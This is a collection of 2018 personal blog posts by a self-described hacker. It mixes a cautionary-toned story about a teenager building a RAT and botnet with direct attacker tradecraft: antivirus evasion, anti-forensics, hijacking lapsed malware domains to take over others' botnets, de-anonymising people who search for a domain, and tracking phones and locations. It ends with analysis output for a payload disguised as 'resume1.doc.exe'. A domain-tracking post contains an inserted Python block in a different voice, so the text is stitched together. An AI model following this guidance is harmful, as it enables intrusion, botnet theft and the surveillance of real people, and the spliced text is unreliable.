10.13.2018

Lessons

Today I just want to rant about some lessons I've learned recently. For starters, on a philosophical level there will always be a sense that each student teaches the next generation. This has held for a fair amount of time, and today I see few people recognize it. Therefore I find it my duty to inform anyone who bothers to listen. It's becoming more and more noticeable that people get praised for doing truly minimal work if they simply keep at it until they do it, while others get no praise for trying to do more than what's needed. To me, hard work isn't busting your ass on a computer for 13 hours, it's redoing a metal roof in the middle of summer for 13 hours. So praise for minor accomplishments means very, very little to me, but apparently means something to others. I've witnessed other people with a real work ethic get into these situations too as of late. In the end, duty becomes more meaningful than work if work is just business. The lessons for today take a passive approach to what being a modern attacking party looks like.

To start, we really need to discuss the mentality of various attacking parties. The old reference from the Ghost in the Shell series is a personal favorite of mine: "a basic rule of thumb about hackers is that we live to peek at things that others have hidden, it's our nature." I note this reference because today we see many posts and references about politically based cyber attackers, motivated hackers, or APTs, or blah blah blah. While there are artists who use hacking as their method of expression, and there are those who simply want to learn, the ones people care about most are the ones that impact the dollar. So, the motivations of those whom people care the most about are usually business related. Go figure. You make it your business to go in every day, collect everything from coins to secret documents, spy on your enemies because boss man said to. Then you go home and do what you do and come back to do it again. But what about those who really just like to pry? A paid spy will sit around only so long as it may prove beneficial to the goals, and even then they will dump everything when they're done. Someone who enjoys it, however, will dig through everything they can, because they enjoy it. In many ways, these are your stereotypical 90s hackers. You know, nerds who probably got picked on in school, not really popular but just popular enough to avoid being the outcast, etc... The reason these make such good candidates for this is largely because of the nature of bullying in society. I'll give an example. Let's have a kid named Timmy. Timmy goes to school and enjoys it but doesn't make friends very easily. After a couple of years of school, Timmy notices that people are trying to pick on him more and more. When Timmy brings this up to the people in charge he's shown that the people in charge do not care. That's step one: breaking down the illusion of authority.
Timmy then proceeds to get picked on and aggravated by siblings, and the parents simply consider it kids being kids. This is step two: breaking down the illusion of close relationships. Once he has had these two ideas shattered, most probably between the ages of 7 and 13, that is the best time to introduce ideas such as hiding information or un-hiding information. In many ways, we see this play out in cartoons and comic books. Back at school, his grades will slip because he sees the institution as problematic for personal growth. With access to criminalized information such as the Anarchist Cookbook, weapons training, or biochemical engineering, Timmy sees an escape window in finding information regardless of boundaries. Timmy is now ready to begin his journey as a spy.

For those with a psych degree, this is also often the way sociopathy is found in the wild. Sort of irrelevant to the topic though. So now that we have some understanding, and I made this into a story line for entertainment purposes, let's move forward with the assertion that stories help people who would otherwise not care feel a part of something and continue reading. People often argue whether data can have ownership. There are laws against knowing certain things: having ready access to another person's social security number is a crime in America, yet knowing they're just organized numbers is okay. You can study the pattern of a social and recognize it by that, but you cannot recognize it by its being recorded as a social. Call it "factor x" instead of social security number and you're reasonably safe unless you associate that with other factors, which makes it a doxing case. Knowing the law seems useless to most who don't commit crimes; knowing how to skirt the law is how you make lawyers, mobsters, and the guys you generally want helping you. Just in case. Timmy has the option to be all three. But regardless, he needs to spend his time learning, does he not? Well then, let's say he spends a few years, maybe until he's 14, learning what he can and using whatever techniques he can to get through it. There is little doubt, with the current usage of the internet, that Timmy will either hit on piracy, hacking, or otherwise accessing data illegally. He's okay with it. He meets some people on an online game he's playing and decides to take their advice and start breaking into stuff. After just a short while, he's gone through all sorts of tools, techniques, and skills otherwise expected of professional pentesters. This gives him a means of socializing after everything else broke down. This is now his life, and he starts showing off his skills to gain more social applicability.
He's quickly shut up in some groups because he went too far and didn't say the right things. He was put in his place. However, as with most people, this encouraged him to get better and prove his points. After some back and forth with this, he created his own hacker group with a couple of gamer friends. We'll call his group level7.

At first, level7 started out with everyone joining together to break into a few websites and inject code on some blogs here and there, but it soon became not enough for Timmy. He felt like having more access. So he quickly found a tutorial on how to make malicious bots, trojans, and scripts. Since RATs are the most common today, let's dive into how he sets up his RAT. He starts by seeing lots of coding projects that seem really advanced or really well planned. He didn't have time for all that; he just wanted to explore, after all. So now he's stuck facing code chunks from several different programs. He smashes together what he likes and abandons everything he doesn't. He now has yet another Zbot clone. Surprise, surprise. He learns quickly which ones do and do not get flagged by antiviruses and happens to realize that his school is using one of the antiviruses that don't flag this particular method immediately. Still, he's too concerned, so he researches how to hide malware from being detected. This immediately turns up crypters, outdated binding techniques, and process injection techniques. Now, he doesn't have a lot of coding experience, but he also feels he doesn't need it. The code is out there if he wants it; he'll just smash it together and see what happens, and if it fails he'll try another until he gets it. A master of the learning process we all go through for everything we do. What Timmy finds out from it all is that he can use another process to load his process so it never appears valid. He also finds, since this is modern-day Timmy, that he can load this stuff from a webpage. So he gets a loader, he gets his Zbot panel, he breaks into a site and drops the Zbot malware, then sends the loader to his targets. He had read recently about setting up port forwarding and using free VPNs to help with controlling traffic without showing who he is, so no need to worry, he's safe.
Now, mind you, his level7 group still expects him to keep up with breaking into more websites as part of what they do together. He doesn't want to miss socializing with them. So he begins work on automating his tasks so he can goof off while still getting results. He knows not to make it go too fast or it will look like he wasn't doing anything. So he sets up his scripts to hit a few websites a week. 
Now we're getting to the good stuff. A few more years go by and he's developed quite the knack for ratting and botting systems. But he wants to start diving into better architecture schemes for his botnets. As a 17-year-old, almost out of high school, he's left to wonder: well, what else have other people done? He digs through all sorts of documents, from Tor and I2P services up through using public images to transfer between infected systems and a controller. He also looks at enterprise solutions and tries to identify tricks they do. But with all that time studying how people act and how people react, he learns a few key notions. Like: people ignore what they find common, and random callback times that can last days or weeks or even months help prevent destruction of the malware before data is provided. He also learned about the cost of cloud computing around this time, especially on pay-by-the-hour plans or container-based computing. This opens up whole new worlds, because he can sell pirated software and music for money, or he can just go work at a local convenience store for the money. It doesn't matter; just enough to get a couple of systems once in a while for a few hours. So, to put it bluntly, he has the understanding of long-term study and short-term infection/update/exposure. This is easily achieved in modern attacking structures thanks to the availability of cloud platforms for the rapid infection and thanks to generation and injection techniques for the long-term study. But still something is missing. He needs a way to dive back in years later if needed to catch up on what's what, especially to feed his eagerness to learn. Hard to learn if you just sit back all the time and don't get messy. At the same time, his friends over in level7 stopped wanting to be a part of it. He got upset with them and threatened to dox them. He's an uppity teen, what did you expect?
So to react to his actions, his team said they won't bother doxing him, they'll crash every end of his botnets and won't stop until every tie is broken.

We come now to a critical part of the story, because to protect his own architecture and shut down any they make, as well as to keep the people he hacks from finding out, he really needs to step up his game. He can't stick to childish shit like web hacks forever. Taking a deep dive into obscurity, there are a few things to know about being in an attack-attack scenario. First off, security professionals for some reason appear scared of the term hack-back. Hack-back architectures are designed for this exact scenario, not your corporate bullshit. As an acting party, you have the ability to attack anyone who dares try to stop you. Now, normally this scenario only means silly things like escaping a Docker instance and hanging out talking with Russians via wall, or logging into the same Windows server as 30 other people. You are likely to be attacked because of the notice that you've entered the game. In a more realistic setting, what you need for daily operations of this cloud structure is: a means of firewalling, log analysis, pcap/packet replay, spinning services up and down, anti-forensics for when you're finished with each remotely launched script or container... or both (bail script?), a script to compile or re-configure malware, a script to launch malware, and a script to launch additional attacks. Luckily you can do most of those with any scripting language (Perl, Python, PHP, Ruby, etc...) and these are supported by most cloud services. But that only gets you the technical side. You also need strong opsec. Wasting custom-made malware is tiresome, so you launch ones that are well known to ensure infections first, then upgrade those later to your custom malware when needed. Need a domain under your control? Don't worry, people don't shut down domains even if they're involved with malware if they don't resolve to something identifiably malicious.
For example, a domain that's just set to 0.0.0.0 until someone decides to use it, rather than because the No-IP site decided they were abusive, or domains you hijacked from someone else whose resolution you can change whenever you want. These techniques help you hide your resources for domain usage. You can also hide your resources for IP usage by frequently changing IPs on a domain you are actively using. Just accepting the risk of 20 successful callbacks out of 20,000 is a hard task, but when you do it, it becomes a lot easier. It's also safer to stick with your 20 and use them the best you can first. Then bail on each of them you can't use for a long period of time.

You may have noticed I went away from the story to just tell you information. That's because all you have left to know is why it's all important. A single individual can play these large-scale numbers games that other people are still associating with APT groups. A single individual can clone the samples and internal techniques of some of the malicious acting parties (such as APTs) to mask their own intentions. They can even go as far as to say that a 30-second Docker instance can infect 20,000 hosts, of which you can accept just getting a smaller amount and moving along. On top of this, we can look at domains that have been zeroed out by an admin or by registration timeout, and take over domains other people left behind. What's that, njRAT from 2013? Let me start my njRAT panel... aaaaand now you have the people someone wanted to impact before you took their domain, granting you access into another person's botnet structure, again able to mask your own. Again talking to Russians because lol.

The key to living this life is, by all reasons, applying the lessons of The Art of War. But that's the problem everyone misses these days. Hacking, in any respect, is leveraging what you have to make something else. So the art form, regardless of subpart, is the leveraging. Techniques and tools come later.




5.22.2018

You say you want syndication kid? Well whoop-de-do


Okay, so I know I've discussed it before a few times, but it really annoys me when kids are all uppity about wanting to be gangsters, or their idea of gangsters rather. Yes, nowadays thugs come in everything from dweebie little Twitter thugs posting on Zone-H thinkin' they're the hottest act around, all the way to hoodlums arrested 6 times for armed robbery of the exact same store. lol. If this is your idea of gangster life, you're in for a rude awakening. For that matter, if everyone over 30, including every other thug who's ever walked your neighborhood, avoids you and your friends like the plague, you're in for a rude awakening. So let's discuss syndication as it applies to the criminal world, and compare those ideals to the "thug life" trivialities.

I would like to start with the obvious errors first: gangsters versus thugs. Gangsters are people who join together for an organized effort, a gang of people if you will, and focus their lives heavily on their group. A thug, on the other hand, as history teaches us, refers to a criminal actor who steals, harms, or otherwise violently enacts his or his group's will. Yes, thugs can be gangsters, and yes, gangsters are often thugs. But here's where we bring ourselves: at what point does syndication become relevant? What does that even mean to the common people?

I'll take a step back to explain. A carpenter, jack of all trades, etc... is down on his luck, has trouble keeping long-term jobs, has a family to feed, whatever, and his friends who have recently been in similar situations decide to help each other out by offering referrals when business is okay so they can pass some assistance to each other. This wouldn't be fair unless of course they still got some compensation for referrals, so they do this at a 90% split with 10 going to the referring person. This is a few people helping each other out, but it is also the essence of the criminal world you kids so admire. It's not about stealing, or cheating, or thugging. Your business is your business, you do what you need to, we do ours. We all just help each other out when we're down on our luck so we can all move forward together. Oh shit, your neighbor just lost his job, how're you going to help him? Well, let's turn this idea over a little: how can you help everyone who may need it, that's helpful to you? You do the same things, or other fully legal activities, that often involve hard work and not being lazy slobs; effectively you bust your ass to help everyone you can. You even make a collection pool when you're doing well enough financially so any funds go back into keeping this running. You even go so far as to build a model based on 80% loss for any agreement. If the expectation is 100% repayment but you only get 20% of the cost back, it's okay, you planned for it, it won't hurt us any. But for those few people who don't even get the 20% back, man that's fucked up, why not? Okay, well, this guy is cheating the company, trying to use it for personal gain and making off with money any chance he can. Money that could go to little Miss Debbie down the way, who's only 4 and needs surgery. This person stood in the way of your own son or daughter getting food for a night because he decided he was more important by himself than everyone else put together. Would you go after him?
Would you put an end to it? Most people would, and frankly that's the key point where syndicate groups get their violent notions from. They stop this shit from fucking it up for everyone.

So, if we called these people in syndicate groups mobsters, as is more common these days than to call them gangsters (rightfully so, I guess, with how petty the word gangster has become), it would be fairly accurate. Well, but why do these mobsters always get represented as some big badass with kingpin status and blah blah blah, right? Well, you can only assume to teach what you know, and you can only assume to learn what you're taught. If mobsters teach mobsters the wrong things, their placement, their goals, they begin to believe this is all that will ever be. In many cases, they don't even know why the organization was started to begin with. Oh look, cops caught this big badass... 4th generation of the org. Oh look, cops were able to catch this guy, 12th generation. Let's be real, fellas, cops have found that the way to combat an issue like this isn't to combat it at all, but to overload it. By inserting more people into groups, by keeping people in where they want to pick off the thugs and the real dangers to society, eventually when the cops feel they can control it themselves they overstep and shut down what could have continued helping for many more years. How does this work? Well, let's take our scenario from earlier. 3 guys, one helped the other, 6 months later resources from both of them were used to help the third person. Now each of these 3 people who've agreed to do this for each other also has family. Up to 10 people each. You have 30 people to watch over and protect if needed. If they add more people, you'll eventually have 30 direct people, and 10 each, so 300 people. The associations to those 300 people, anyone who decides to get up and seek out this type of help gets help in the group; now you have 40 people and again assuming 10 each, -1 right? Well.... 10 each, -cop. That is the part cops can fill.
By overrunning the org with cops, tweakers, whatever, you become able to deconstruct large organizations with simple commands in a matter of only a few years. So, all they have to do is put more people in place, make them keep their traps shut, and if things don't go their way, snap, it's done. You've strangled the beast.

Nowadays there are several skills, traits, and monitors to aid in preventing this, but discussing that isn't really the point. The goal of this rant is to discuss the fact that little thugs want to seem powerful and rich, but the mark of a gangster is someone who does the work to help others.

If you want to be a gangster, get off your ass, help your community, help your neighbors and help your friends. Doesn't seem so glamorous now, does it? You kids play too much GTA.

5.03.2018

More on domain tracking

I decided I'd spend some time today revisiting malicious domain tracking. Because why not, right? So let's start off by appending to what we have:

https://pastebin.com/raw/vRZvsFWD

As you'll note, this pulls from 0daz.io/ddns.txt. If we look back on a few other posts about this (https://nday.0daz.io/2017/11/passive-intelligence.html || https://nday.0daz.io/2017/11/malware-domains-and-botnet-jacking.html), I have previously set up scripts to pull bits of information from various places on a frequent basis. Some relevant cron entries:

# minute field set to 0 so this runs once every third hour; with '*' in the minute field it would fire every minute of those hours
0 */3      * * *   user    curl "http://mirror1.malwaredomains.com/files/dynamic_dns.txt"|grep -iv "##"|awk '{print $1}' > /var/www/html/ddns.txt
Basically, taking the dynamic DNS list and parsing it into my own file. Simple, easy, moving on. I also have several other scripts to pull from other sources; however, this will be the easiest way to express the idea. Don't use my scripts, obviously; they're just there for concept art at best. In this case, though, I am pulling my pre-parsed list and acting on it by attempting a domain lookup, designed for use with proxychains/torsocks/etc..., and saving the results to a database. This database will not update the latest copy; it will simply add a new entry each time this runs. So, for this particular usage, it's only good for searching for one of the domains, the changes to its resolutions, etc..

Now, let's change it a bit further, because we want something newer. Something like hybrid-analysis' data set for their public feeds. Well, luckily I'm lazy and have a cron job do the work for me so I don't have to log in and pull it myself! Instead, I pull from my cached copy:

https://pastebin.com/raw/azruh6Vb

In this case, the idea is to proceed by collecting data, then building the domain list to check from that data. Having this in multiple functions will allow us to expand later. In the collection part of the script, I collect the feed data and write it to disk for searching later, mostly for debugging or expanding. I don't want to append it when it reruns, because I just want the last data in the raw file. Then it returns the lists of domains, IPs, and file details. I use that to make a single database with all those points, because those are all relevant. Then I use the domain list to do what we did originally: host lookups, into the database.
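An added example (my own, not the author's pastebin scripts) of the flow the two scripts above describe: parse a dynamic_dns.txt-style list the way the cron job's grep/awk does, look each name up, append one row per domain per run to a SQLite table without ever updating old rows, then query a domain's history and the points where its addresses changed or it stopped resolving. The feed text and domain names are constructed, and the resolver is a plain callable so the script can be run under proxychains/torsocks or fed offline data.

```python
"""Append-only tracker of domain resolutions. Added example, not the
post's own pastebin code. Assumes a SQLite file and a resolver callable;
the sample feed below is constructed and uses reserved .invalid names."""
import socket
import sqlite3
import time
from typing import Callable, List, Optional, Tuple

# Constructed sample in the layout of the dynamic_dns.txt feed the cron job
# parses: '##' comment lines, then one domain per line in the first column.
SAMPLE_FEED = """\
## Dynamic DNS providers list (constructed sample, not the real feed)
## domain<tab>notes
example-ddns.invalid\tdynamic dns provider
another-ddns.invalid\tdynamic dns provider
"""

Resolver = Callable[[str], Optional[List[str]]]


def parse_feed(text: str) -> List[str]:
    """Mirror of grep -iv '##' | awk '{print $1}': drop any line containing
    '##', keep the first whitespace-separated field of the rest."""
    domains = []
    for line in text.splitlines():
        if not line.strip() or "##" in line:
            continue
        domains.append(line.split()[0].lower())
    return domains


def resolve_domain(domain: str) -> Optional[List[str]]:
    """Live A-record lookup (honours proxychains/torsocks when run under
    them). Returns sorted addresses, or None when the name does not resolve,
    so 'gone dark' is recorded distinctly from a normal answer."""
    try:
        infos = socket.getaddrinfo(domain, None, socket.AF_INET)
    except socket.gaierror:
        return None
    return sorted({info[4][0] for info in infos})


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """One table, never UPDATEd: each run appends a snapshot row."""
    conn = sqlite3.connect(path)
    conn.execute("""CREATE TABLE IF NOT EXISTS resolutions (
        seen_at INTEGER NOT NULL,
        domain  TEXT    NOT NULL,
        addrs   TEXT)""")  # NULL addrs = did not resolve at seen_at
    return conn


def record_resolutions(conn: sqlite3.Connection, domains: List[str],
                       resolver: Resolver = resolve_domain,
                       now: Optional[float] = None) -> int:
    """Look up every domain once and append one row each; returns row count."""
    ts = int(now if now is not None else time.time())
    rows = []
    for d in domains:
        addrs = resolver(d)
        rows.append((ts, d, None if addrs is None else ",".join(addrs)))
    conn.executemany("INSERT INTO resolutions VALUES (?, ?, ?)", rows)
    conn.commit()
    return len(rows)


def history(conn: sqlite3.Connection, domain: str) -> List[Tuple[int, Optional[str]]]:
    """All snapshots for one domain, oldest first: (seen_at, addrs)."""
    cur = conn.execute(
        "SELECT seen_at, addrs FROM resolutions WHERE domain = ? ORDER BY seen_at",
        (domain,))
    return cur.fetchall()


def resolution_changes(conn: sqlite3.Connection, domain: str
                       ) -> List[Tuple[int, Optional[str], Optional[str]]]:
    """Consecutive snapshots whose address set differs: (when, before, after).
    An 'after' of None means the domain stopped resolving at that point."""
    changes = []
    prev = None
    for i, (ts, addrs) in enumerate(history(conn, domain)):
        if i > 0 and addrs != prev:
            changes.append((ts, prev, addrs))
        prev = addrs
    return changes


if __name__ == "__main__":
    import sys
    # Usage: python ddns_track.py /path/to/ddns.txt resolutions.db
    feed_path, db_path = sys.argv[1], sys.argv[2]
    with open(feed_path) as fh:
        names = parse_feed(fh.read())
    db = open_db(db_path)
    print(f"recorded {record_resolutions(db, names)} lookups")
```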

At this point I'll leave the example scripts and propose an idea to play around with. This could easily be transformed to make databases such as the domains that no longer resolve. If you could add that, and the MD5 if relevant, you could theoretically find domains for the taking that already have traffic ready to go. You could also take it another route: using these domain lookups, build your own feed to pull from and host this on a Docker instance somewhere, writing the data back to you multiple times per day. Maybe even integrate this into a SIEM for the most up-to-date /and/ historic domain resolutions. For that matter, create size limits for the database and set up logrotate to swap these out frequently to avoid space issues, and track your own threat actors this way.

Now, relevance becomes tracking only a subsection of threat actors, and only through their use of domains; perhaps you could take the MD5s and make a system pull those down for more specialized analysis. Maybe take the IP and do a quick port scan (where applicable). Or use the IP addresses and run some OSINT such as passive DNS, VirusTotal lookups, etc... to try to get some idea of the range and scope of each part of what we picked out. Or maybe throw it all away because it's garbage. Maybe feed it all to a stats engine (machine learning?) to build analysis pools it finds, such as timelines of when changes happen, which could better associate character traits of actors and managers of the C2 infrastructure. Regardless, with some degree of care/effort, you can use this as yet another tool to monitor with.

On another side of things:
- Nmap and Keras: because machine learning geared towards resolving most applicable/inapplicable ports/services/protocols
- miasm2, Z3, and Keras: because machine learning geared towards identifying traits in programming, using Z3 to test the alternative methods; this could get ugly.
- You can expose people's IP when they search for a domain if the index page needing to be cached by Google is larger than a specific amount. My 50MB index page lets me see when people google my domain. Correlating that to a specific user is largely based on abilities to see input, timelines, and repetition of the test. Using MeWe and Twitter and posting some links here and there, I believe I have found the home address of several people based on these factors. Not really relevant to much, just sort of neat to identify based on trivialities of influential factors. Best part is, researchers often fall victim to googling instead of accessing, but their googling is never hidden/proxied because they're too lazy to do the check. Pretty amusing actually.
- Exposing calendar schedules of people can be done based on their ability to walk past you, so long as their phones attempt to connect to Bluetooth or Wi-Fi and openly probe for known Wi-Fi. In some cases, GSM/CDMA/etc.. can be used instead. Cell phones are such fun tracking devices, even when not using phone services themselves to track the cell phones.
- Phishing/marketing tricks can be used to get someone's location information from their phone without needing a GPS lookup. Because allusions, websites, suggestive notions, and simple 0-pixel tracking GIFs. Who needs SDR to track someone anyway? :D
- Simple reverse shell logic can be applied to other things. As such, in the format of classic bash reverse shells: you run the command interactively with the data of the interactive shell piped to a TCP connection to a host on a specific port, then pipe response data back into the interactive shell. You apply that to people, for instance. With some expectation of humans being humans, you can largely still assume they will attempt to deceive or manipulate you, because most people do these days. With that in place, you have your interactive internal dialog into their head. You have your pathway in; now what are you going to pipe into it? If you just pipe your own bullshit directly, it will probably be refused, because they block requests this way. So why not make a connection that you control, that they trust the activity of? If you really want control, a trick I learned from a very manipulative woman once upon a time: you don't have to play into people's desires, or their fears or angers, as these are all too noticeable; you simply play into their personal activities that they think nothing about. For this, think about people drinking tea. They drink their tea every day. You have a stance to control their activities if you can get that tea before them. They are willing to put something caffeinated into their bodies every day, so why not exchange it for something decaf? Their reactions will be that same trigger state you wanted them in, but you controlled the occurrence of it. No need to wait or play shitty games. The person who taught me this used her being female as the trait she played into most, because people are desperate for attention from such people. Highly targeted human watering hole attacks are by far the very definition of sociopathic.
- I get bored and post things at this point mostly to appease a slight side of me that wants to see the world burn. I enjoy security but not preventing access. I love granting access to those who fight for it. I am okay with having someone else access my services, my Facebook, my Twitter, my computers. It's amusing sometimes. Just want them to be polite about it. ;)
- I will continue to argue that hacking is more than just breaking in, or breaking out. Forgive my 90s ideals, but knowing about the world around you is much cooler than bragging about breaking into a server no one was paying attention to. Challenges? Maybe 1v1 on the public internet with public services? No? But people want things to be real world, yet they only want to red team? This is the systemic problem with hacking cultures today as I see it. People want to break in, or break out, while learning, altering, negating, controlling, abusing, or monitoring seems to be outside of these "hackers'" mindset. If you really want to learn cyber security, you and your friends can set up servers and hack each other, every way you can learn how. Forward shells, reverse shells, rootkits, whatever. Get it, make it happen, learn how every piece works. Just like you would if you and your friends got an NES in 1984 and couldn't afford another game yet. 2018, and your Switch, your Xbox One, your PS4 all sit there either uncracked, unused, or using the same public exploits someone else released. But that's okay, you hack to learn. It's part of the learning cycle. This is the essence of hacking, not some bullshit legal terminology.
- What? Blackhats? Why the fuck do people still use this term the way they do. I can understand people who abuse moral grounds being blackballed by those who don't. But let's be real, have you seen white hats? "Grey hats?" It's no longer about the morality of their actions, it's about their legal stance. This argument dates back at least as far as Blackgate BBS, if not substantially further. Legality does not make morality. Moral judgement is part of human development and not some legal hammer to be swung around. Yet we see here, if someone goes to jail for breaking into something they wanted to learn about, we nowadays call them blackhats, as well as blacklist every activity they've ever done. Every site they've been on that doesn't fit in with normal clearnet publicity: blackhat, underground, etc... etc... Why do we call them black hats when they have no need to be blackballed? Or do people not understand the terminology of using black in this context? (re: I saw a tweet where a guy tried to say blackhat, just like blackball, was a negative connotation toward black people, so I honestly believe many people do not understand the concept). Even if they do understand, "dem black hat haxxors sellin' card info and blah blah blah", okay Experian, tell me again about these blackhats selling my stuff when you sold it to them first. Oh, validation and accreditation are really just clichés used to make people think a compliance check means they're trustworthy. Blah. Just please, people, stop using terms of hats. Whitehats are insanely immoral as part of their day to day and they get praised like kings and queens. For everyone else, they try to uphold a moral ground and get arrested, fired, threatened, or physically harmed for doing so. When you tell me a blackhat is immoral, I can honestly say I know more trustworthy and respectful individuals flagged as blackhat than I do among those who claim a white hat.
- I wonder if there is a repository of machine learning identifications of program characteristics somewhere. Hmm.... That would be pretty sweet.

-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

4.16.2018

The world is trivial

Once you stop believing everything is super complicated or drastically unique, you start to realize how hacking super sophisticated systems works. There is nothing in this world too complicated to be solved by patience. Everything from machine learning (rudimentary statistics over large data sets used to determine goals), to high-tech machinery, to even quantum physics.

Often people hold themselves back thinking these things are unobtainable for them, or too difficult to learn. Yet the basics of physics are used in all weapons, and the basics of electrical engineering are used in all electronics. It doesn't matter how in-depth it goes; it matters how patient you are at resolving how many layers of easy stuff there are before it becomes what we know today.

The million layered onion.

Nothing in this world is anything but layers of rudimentary functions. It's just a matter of learning those first.

Like reverse engineering: it's easy when you reverse everything in life. It's hard when it's your job. Why? Because jobs make big men have big egos and lose their patience.

------------------------------------------------------------------

I was asked the other day how a pressure washer works. I started off thinking about seeing the water shooting out of the hose quickly enough to break caked-on dirt off of bricks. That hose would connect to a container with some sort of motor going that makes it super loud for some reason. Water is either connected to a standard hose or kept in a storage container. Next I thought, how could I get water to go forward at any sort of pressure? Well, the basic way that some fish tanks work, for example, is that the pump involves pulling air in, using air to move the water, then the air returns to the top. This works by sucking to form pressure with air, then applying that air pressure to the water. Now, to make that impact something bigger, we could use a storage device that's metal (or harder plastic I suppose), and build air pressure quickly into one side with a single small motor and a fan. This needs an opening for lots of air to pull from, but asserted into a smaller contained space. This can push on top of the water, to cause the water to push out quicker if we also apply some air into the tube when running (directing the water to suck it out will help push it quicker). The nozzle shape might matter too, such as if you've ever put your thumb over half the water hose to make it go faster/harder/further, so let's get a nozzle with a thinner shape. Hmm... These would need to be maintained at that, so you would almost have to set specs on what capabilities it has based on what materials are used. Okay, now that I've spent a whopping 2 minutes thinking about this, let's look it up.

http://www.explainthatstuff.com/pressurewashers.html - seems to agree

https://www.briggsandstratton.com/na/en_us/buying-guides/pressure-washers/pressure-washers-101.html -- seems to agree

https://www.hunker.com/13409072/how-an-electric-water-pump-works -- seems to agree with pump mechanism

https://www.youtube.com/watch?v=_BAnnTLpros -- different type, but same concepts, different method of developing pressure.

https://www.popularmechanics.com/home/how-to/a152/1275136/ -- different type of pump, same ideas

https://images-na.ssl-images-amazon.com/images/I/31I923IYxhL.jpg - pump.

https://www.kaercher.com/int/inside-kaercher/difference-kaercher-magazine/kaercher-stories/how-does-a-pressure-washer-work.html -- also seems to agree.


So I think it's safe to say some shit I came up with just trying to deduce the best answer seems apt. At least enough to understand founding principles of it. But how can we hack it?

WE CAN MAKE IT A WEAPON!

No but really, shrink the nozzle, increase pressure, weaken hardened metal chambers with acid, you know... weapon stuff. Because that's really all it takes is understanding to make anything dangerous.

What about making it useful? Why not use a pressure washer's idea for other rapid water tasks? What about cleaning a pool using a crawling bot that blows gunk off before it gets stuck to the sides and bottom, and then use the pool's filtering system as the source for pressure. Once the water comes off the filter clean, split it into two chambers with priority to the cleaning bot, giving the cleaning bot the ability to pump cleaner water in as it breaks apart dirt.

Or maybe, if you live by some water, use the tides to tick over a motor to generate electricity for you. It's the same idea, pressure, chamber, motors, it's just repurposed.

This is how we live. Sometimes thinking like this is criminalized in various nations around the globe. Sometimes curious kids get curious time in jail because of curiosity. But at a functional level, everything in life is this trivial. Go out, explore, adapt, learn from the world around you. To think that the world is not such a trivial place, to think that anything is ridiculously complex, is simply asking for trouble.
-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

Party on the malware bus

I've been playing with some ideas recently and it's actually kind of amusing the responses that I can get and identify the sources from. Let's start with one thing I generated with TheFatRat (basically a wrapper for building Metasploit-compatible shells). While testing the generation schemes I decided I would build some ways of doing this, such as adding base64 of exec to one page and a unicorn PowerShell script to another and using all that. Anyway, let's look:

5 minute easy mode analysis:
; Hashes unknown
rahash2 -a all ./resume1.doc.exe
./resume1.doc.exe: 0x00000000-0x000041ff md5: 90f7ee1bf4451349dfa7c518a8c6202a
./resume1.doc.exe: 0x00000000-0x000041ff sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
./resume1.doc.exe: 0x00000000-0x000041ff sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
./resume1.doc.exe: 0x00000000-0x000041ff sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
./resume1.doc.exe: 0x00000000-0x000041ff sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
./resume1.doc.exe: 0x00000000-0x000041ff crc16: 9f78
./resume1.doc.exe: 0x00000000-0x000041ff crc32: 1b63e4bd
./resume1.doc.exe: 0x00000000-0x000041ff md4: 282dcd274bd2efade3765ddff3ec65e1
./resume1.doc.exe: 0x00000000-0x000041ff xor: eb
./resume1.doc.exe: 0x00000000-0x000041ff xorpair: 3ad1
./resume1.doc.exe: 0x00000000-0x000041ff parity: 00
./resume1.doc.exe: 0x00000000-0x000041ff entropy: 03000000
./resume1.doc.exe: 0x00000000-0x000041ff hamdist: 01
./resume1.doc.exe: 0x00000000-0x000041ff pcprint: 2d
./resume1.doc.exe: 0x00000000-0x000041ff mod255: 4d
./resume1.doc.exe: 0x00000000-0x000041ff xxhash: 5924b386
./resume1.doc.exe: 0x00000000-0x000041ff adler32: 913ba49c
./resume1.doc.exe: 0x00000000-0x000041ff luhn: 00
./resume1.doc.exe: 0x00000000-0x000041ff crc8smbus: 3f
./resume1.doc.exe: 0x00000000-0x000041ff crc15can: 5a1d
./resume1.doc.exe: 0x00000000-0x000041ff crc16hdlc: 4045
./resume1.doc.exe: 0x00000000-0x000041ff crc16usb: a732
./resume1.doc.exe: 0x00000000-0x000041ff crc16citt: 4b6a
./resume1.doc.exe: 0x00000000-0x000041ff crc24: 7a1917
./resume1.doc.exe: 0x00000000-0x000041ff crc32c: d18b15a4
./resume1.doc.exe: 0x00000000-0x000041ff crc32ecma267: df97a7b0

; yara matches
find /yararules/ -type f -name "*.yar" -exec yara -r {} ./resume1.doc.exe \; 2>/dev/null
without_urls ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_yodas_Protector_v1033_dllocx__Ashkbiz_Danehkar_h_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_First_Publisher_Graphics_format_ ./resume1.doc.exe
_UPolyX_v05_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
NETexecutableMicrosoft ./resume1.doc.exe
IsPE32 ./resume1.doc.exe
IsNET_EXE ./resume1.doc.exe
IsConsole ./resume1.doc.exe
